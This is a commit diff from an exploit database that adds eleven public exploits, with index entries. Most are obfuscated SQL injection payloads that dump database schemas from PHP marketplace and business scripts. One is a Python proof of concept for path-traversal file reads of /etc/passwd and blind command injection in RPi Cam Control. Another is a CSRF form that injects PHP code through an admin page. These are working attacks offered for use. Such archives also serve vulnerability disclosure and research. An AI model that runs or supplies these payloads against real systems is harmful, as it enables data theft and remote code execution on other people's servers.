DB: 2017-09-11
11 new exploits Just Dial Marketplace Script - Authentication Bypass Just Dial Marketplace - Authentication Bypass Online Print Business 1.0 - SQL Injection Escort Marketplace 1.0 - SQL Injection Babysitter Website Script 1.0 - SQL Injection Job Board Software 1.0 - SQL Injection RPi Cam Control <= 6.3.14 - Multiple Vulnerabilities Just Dial Marketplace 1.0 - SQL Injection Professional Service Booking 1.0 - SQL Injection Restaurant Website Script 1.0 - SQL Injection Law Firm 1.0 - SQL Injection Topsites Script 1.0 - Cross-Site Request Forgery / PHP Code Injection My Builder Marketplace 1.0 - SQL Injection
This commit is contained in:
parent
eabeaa97ef
commit
7744909119
12 changed files with 390 additions and 1 deletions
13
files.csv
13
files.csv
|
@ -37613,7 +37613,7 @@ id,file,description,date,author,platform,type,port
|
|||
41040,platforms/linux/webapps/41040.txt,"Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution",2017-01-13,"Ozer Goker",linux,webapps,0
|
||||
41043,platforms/php/webapps/41043.txt,"My Private Tutor Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41044,platforms/php/webapps/41044.txt,"Hindu Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41045,platforms/php/webapps/41045.txt,"Just Dial Marketplace Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41045,platforms/php/webapps/41045.txt,"Just Dial Marketplace - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41046,platforms/php/webapps/41046.txt,"Entrepreneur Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41047,platforms/php/webapps/41047.txt,"Open Source Real-Estate Script - SQL Injection",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41048,platforms/php/webapps/41048.txt,"Inout StickBoard 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
|
@ -38068,6 +38068,7 @@ id,file,description,date,author,platform,type,port
|
|||
42545,platforms/php/webapps/42545.txt,"Matrimonial Script - SQL Injection",2017-08-22,"Ihsan Sencan",php,webapps,0
|
||||
42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0
|
||||
42621,platforms/php/webapps/42621.html,"Advertiz PHP Script 0.2 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps,0
|
||||
42640,platforms/php/webapps/42640.txt,"Online Print Business 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
|
||||
42544,platforms/java/webapps/42544.py,"Automated Logic WebCTRL 6.5 - Unrestricted File Upload / Remote Code Execution",2017-08-22,LiquidWorm,java,webapps,0
|
||||
41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
|
||||
41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
|
||||
|
@ -38309,6 +38310,7 @@ id,file,description,date,author,platform,type,port
|
|||
42419,platforms/php/webapps/42419.txt,"Premium Servers List Tracker 1.0 - SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
|
||||
42420,platforms/php/webapps/42420.txt,"EDUMOD Pro 1.3 - SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
|
||||
42421,platforms/php/webapps/42421.txt,"Muviko 1.0 - 'q' Parameter SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
|
||||
42635,platforms/php/webapps/42635.txt,"Escort Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
|
||||
42423,platforms/php/webapps/42423.txt,"Joomla! Component StreetGuessr Game 1.1.8 - SQL Injection",2017-08-03,"Ihsan Sencan",php,webapps,0
|
||||
42427,platforms/hardware/webapps/42427.html,"Technicolor TC7337 - 'SSID' Persistent Cross-Site Scripting",2017-08-03,"Geolado giolado",hardware,webapps,0
|
||||
42431,platforms/php/webapps/42431.txt,"WordPress Plugin Easy Modal 2.0.17 - SQL Injection",2017-08-07,defensecode,php,webapps,80
|
||||
|
@ -38416,3 +38418,12 @@ id,file,description,date,author,platform,type,port
|
|||
42632,platforms/php/webapps/42632.txt,"EzInvoice 6.02 - SQL Injection",2017-09-07,"Ihsan Sencan",php,webapps,0
|
||||
42633,platforms/hardware/webapps/42633.txt,"Roteador Wireless Intelbras WRN150 - Cross-Site Scripting",2017-09-07,"Elber Tavares",hardware,webapps,0
|
||||
42634,platforms/hardware/webapps/42634.txt,"Huawei HG255s - Directory Traversal",2017-09-07,"Ahmet Mersin",hardware,webapps,0
|
||||
42636,platforms/php/webapps/42636.txt,"Babysitter Website Script 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
|
||||
42637,platforms/php/webapps/42637.txt,"Job Board Software 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
|
||||
42638,platforms/php/webapps/42638.py,"RPi Cam Control <= 6.3.14 - Multiple Vulnerabilities",2017-08-16,"Alexander Korznikov",php,webapps,0
|
||||
42639,platforms/php/webapps/42639.txt,"Just Dial Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
|
||||
42641,platforms/php/webapps/42641.txt,"Professional Service Booking 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
|
||||
42642,platforms/php/webapps/42642.txt,"Restaurant Website Script 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
|
||||
42643,platforms/php/webapps/42643.txt,"Law Firm 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
|
||||
42644,platforms/php/webapps/42644.html,"Topsites Script 1.0 - Cross-Site Request Forgery / PHP Code Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
|
||||
42645,platforms/php/webapps/42645.txt,"My Builder Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
29
platforms/php/webapps/42635.txt
Executable file
29
platforms/php/webapps/42635.txt
Executable file
|
@ -0,0 +1,29 @@
|
|||
# # # # #
|
||||
# Exploit Title: Escort Website Script 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 09.09.2017
|
||||
# Vendor Homepage: http://scriptzee.com/
|
||||
# Software Link: http://scriptzee.com/escort-website
|
||||
# Demo: http://escortwebsite.scriptzee.com/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/prof_detils.html?escort=[SQL]
|
||||
#
|
||||
# -1418820035'+/*!11112UnIoN*/+(/*!11112SelEcT*/0x283129,0x283229,0x283329,0x283429,(Select+export_set(5,@:=0,(/*!11112SelEcT*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629)--+-
|
||||
#
|
||||
# http://localhost/[PATH]/ajax_rating.php?escort=[SQL]
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
27
platforms/php/webapps/42636.txt
Executable file
27
platforms/php/webapps/42636.txt
Executable file
|
@ -0,0 +1,27 @@
|
|||
# # # # #
|
||||
# Exploit Title: Babysitter Website Script 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 09.09.2017
|
||||
# Vendor Homepage: http://scriptzee.com/
|
||||
# Software Link: http://scriptzee.com/best-softwares/babysitter-website
|
||||
# Demo: http://babysitter.scriptzee.com/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/taskers?skills=[SQL]
|
||||
#
|
||||
# 63'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+1=1='
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
27
platforms/php/webapps/42637.txt
Executable file
27
platforms/php/webapps/42637.txt
Executable file
|
@ -0,0 +1,27 @@
|
|||
# # # # #
|
||||
# Exploit Title: Job Board Software 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 09.09.2017
|
||||
# Vendor Homepage: http://scriptzee.com/
|
||||
# Software Link: http://scriptzee.com/best-softwares/job-board-software
|
||||
# Demo: http://jobsite.scriptzee.com/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/job-details/[SQL]/eFe
|
||||
#
|
||||
# -131'+/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229)--+-/eFe
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
71
platforms/php/webapps/42638.py
Executable file
71
platforms/php/webapps/42638.py
Executable file
|
@ -0,0 +1,71 @@
|
|||
#####
|
||||
# Exploit Title: RPi Cam Control <= v6.3.14 (RCE) Multiple Vulnerabilities - preview.php
|
||||
# Date: 16/08/2017
|
||||
# Exploit Author: Alexander Korznikov
|
||||
# Vendor Homepage: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
|
||||
# Software Link: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
|
||||
# Version: <= v6.3.14
|
||||
# Date 16/08/2017
|
||||
#
|
||||
# A web interface for the RPi Cam
|
||||
# Vendor github: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
|
||||
#
|
||||
# Bug Discovered by Alexander Korznikov:
|
||||
# www.exploit-db.com/author/?a=8722
|
||||
# www.linkedin.com/in/nopernik
|
||||
# www.korznikov.com
|
||||
#
|
||||
# RPi Cam Control <= v6.3.14 is vulnerable to Local File Read and Blind Command Injection.
|
||||
#
|
||||
#
|
||||
# Local File Read (get /etc/passwd file):
|
||||
# ----------------
|
||||
# POST /preview.php HTTP/1.1
|
||||
# Host: 127.0.0.1
|
||||
# Content-Type: application/x-www-form-urlencoded
|
||||
# Connection: close
|
||||
# Content-Length: 80
|
||||
#
|
||||
# download1=../../../../../../../../../../../../../../../../etc/passwd.v0000.t
|
||||
#
|
||||
#
|
||||
# Blind Command Injection:
|
||||
# ------------------
|
||||
# POST /preview.php HTTP/1.1
|
||||
# Host: 127.0.0.1
|
||||
# Content-Type: application/x-www-form-urlencoded
|
||||
# Connection: close
|
||||
# Content-Length: 52
|
||||
#
|
||||
# convert=none&convertCmd=$(COMMAND_TO_EXECUTE)
|
||||
#
|
||||
#
|
||||
# Blind Command Injection can be used with Local File Read to properly get the output of injected command.
|
||||
#
|
||||
# Proof of Concept Code:
|
||||
#####
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
import requests
|
||||
import sys
|
||||
if not len(sys.argv[2:]):
|
||||
print "Usage: RPi-Cam-Control-RCE.py 127.0.0.1 'cat /etc/passwd'"
|
||||
exit(1)
|
||||
|
||||
def GET(target, rfile):
|
||||
res = requests.post("http://%s/preview.php" % target,
|
||||
headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
|
||||
data={"download1": "../../../../../../../../../../../../../../../../{}.v0000.t".format(rfile)})
|
||||
return res.content
|
||||
|
||||
def RCE(target, command):
|
||||
requests.post("http://%s/preview.php" % target,
|
||||
headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
|
||||
data={"convert": "none", "convertCmd": "$(%s > /tmp/output.txt)" % command})
|
||||
return GET(target,'/tmp/output.txt')
|
||||
|
||||
target = sys.argv[1]
|
||||
command = sys.argv[2]
|
||||
|
||||
print RCE(target,command)
|
26
platforms/php/webapps/42639.txt
Executable file
26
platforms/php/webapps/42639.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
# # # # #
|
||||
# Exploit Title: Just Dial Marketplace Software 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 09.09.2017
|
||||
# Vendor Homepage: http://scriptzee.com/
|
||||
# Software Link: http://scriptzee.com/best-softwares/just-dial-marketplace
|
||||
# Demo: http://classified.scriptzee.com/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/result/[SQL]/eFe
|
||||
# http://localhost/[PATH]/business/[SQL]/eFe
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
29
platforms/php/webapps/42640.txt
Executable file
29
platforms/php/webapps/42640.txt
Executable file
|
@ -0,0 +1,29 @@
|
|||
# # # # #
|
||||
# Exploit Title: Online Print Business Software 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 09.09.2017
|
||||
# Vendor Homepage: http://scriptzee.com/
|
||||
# Software Link: http://scriptzee.com/best-softwares/online-print-business
|
||||
# Demo: http://onlineprintbssiness.scriptzee.com/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/product-decs.php?cat_id=[SQL]
|
||||
#
|
||||
# -149++/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x28323729,0x28323829,0x28323929)--+-
|
||||
#
|
||||
# http://localhost/[PATH]/info.php?page=[SQL]
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
33
platforms/php/webapps/42641.txt
Executable file
33
platforms/php/webapps/42641.txt
Executable file
|
@ -0,0 +1,33 @@
|
|||
# # # # #
|
||||
# Exploit Title: Professional Service Booking Software 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 09.09.2017
|
||||
# Vendor Homepage: http://scriptzee.com/
|
||||
# Software Link: http://scriptzee.com/best-softwares/professional-service-booking-engine
|
||||
# Demo: http://professionalservice.scriptzee.com/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/content.php?page=[SQL]
|
||||
#
|
||||
# -7+/*!50000UniOn*/+/*!50000SelECt*/+0x496873616e2053656e63616e,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))--+---+-
|
||||
#
|
||||
# http://localhost/[PATH]/best_pro_details.php?service_id=[SQL]
|
||||
#
|
||||
# -54'++/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929)--+-
|
||||
#
|
||||
# http://localhost/[PATH]/alllikes.php?service_id=[SQL]
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
29
platforms/php/webapps/42642.txt
Executable file
29
platforms/php/webapps/42642.txt
Executable file
|
@ -0,0 +1,29 @@
|
|||
# # # # #
|
||||
# Exploit Title: Restaurant Website Script 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 09.09.2017
|
||||
# Vendor Homepage: http://scriptzee.com/
|
||||
# Software Link: http://scriptzee.com/small-business/restaurant-website-script
|
||||
# Demo: http://restaurant.scriptzee.com/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/cms.php?id=[SQL]
|
||||
#
|
||||
# -6'++/*!00002UNION*/+/*!00002SELECT*/+0x31,0x32,0x33,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,19,20,0x3231,0x3232--+-
|
||||
#
|
||||
# http://localhost/[PATH]/contact.php?id=[SQL]
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
25
platforms/php/webapps/42643.txt
Executable file
25
platforms/php/webapps/42643.txt
Executable file
|
@ -0,0 +1,25 @@
|
|||
# # # # #
|
||||
# Exploit Title: Law Firm Website Script 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 09.09.2017
|
||||
# Vendor Homepage: http://scriptzee.com/
|
||||
# Software Link: http://scriptzee.com/small-business/law-firm-website
|
||||
# Demo: http://lawwebsite.scriptzee.com/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/business-searchlist?country=[SQL]&state=[SQL]&city=[SQL]&farm_cat=[SQL]
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
57
platforms/php/webapps/42644.html
Executable file
57
platforms/php/webapps/42644.html
Executable file
|
@ -0,0 +1,57 @@
|
|||
<!--
|
||||
# # # # #
|
||||
# Exploit Title: jRank - Topsites Script 1.0 - Cross-Site Request Forgery
|
||||
# Dork: N/A
|
||||
# Date: 10.09.2017
|
||||
# Vendor Homepage: https://topsitesscript.com/
|
||||
# Software Link: https://topsitesscript.com/topsites-script-demo/
|
||||
# Demo: http://www.topsitesscript.com/demo/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
-->
|
||||
<form action="http://localhost/[PATH]/admin/headerfooter.php" method="post">
|
||||
<input name="action" value="edit" type="hidden">
|
||||
<table width="95%" cellspacing="1" cellpadding="3" border="0" align="center">
|
||||
<tbody>
|
||||
<tr bgcolor="#3498DB">
|
||||
<td><b style="color:#FFFFFF;">Meta Tags File</b></td>
|
||||
</tr>
|
||||
<tr bgcolor="#FFFFFF">
|
||||
<td>
|
||||
<textarea cols="10" rows="2" name="meta" style="width: 100%">
|
||||
<!--
|
||||
Html Code etc.....
|
||||
-->
|
||||
</textarea>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
<table width="95%" cellspacing="1" cellpadding="3" border="0" align="center">
|
||||
<tbody>
|
||||
<tr bgcolor="#3498DB">
|
||||
<td><b style="color:#FFFFFF;">Footer File</b></td>
|
||||
</tr>
|
||||
<tr bgcolor="#FFFFFF">
|
||||
<td><textarea cols="60" rows="7" name="footer" style="width: 100%">
|
||||
<!--
|
||||
Php Code etc.....
|
||||
-->
|
||||
</textarea>
|
||||
</td>
|
||||
</tr>
|
||||
<tr bgcolor="#FFFFFF">
|
||||
<td>
|
||||
<font face="verdana" size="2"><center><input name="submit" value="Edit" type="submit"></center></font>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</form>
|
25
platforms/php/webapps/42645.txt
Executable file
25
platforms/php/webapps/42645.txt
Executable file
|
@ -0,0 +1,25 @@
|
|||
# # # # #
|
||||
# Exploit Title: My Builder Marketplace Script 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 09.09.2017
|
||||
# Vendor Homepage: http://scriptzee.com/
|
||||
# Software Link: http://scriptzee.com/best-softwares/my-builder-marketplace
|
||||
# Demo: http://mybuilderjobs.scriptzee.com/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/marketplace?start_date=[SQL]
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
Loading…
Add table
Reference in a new issue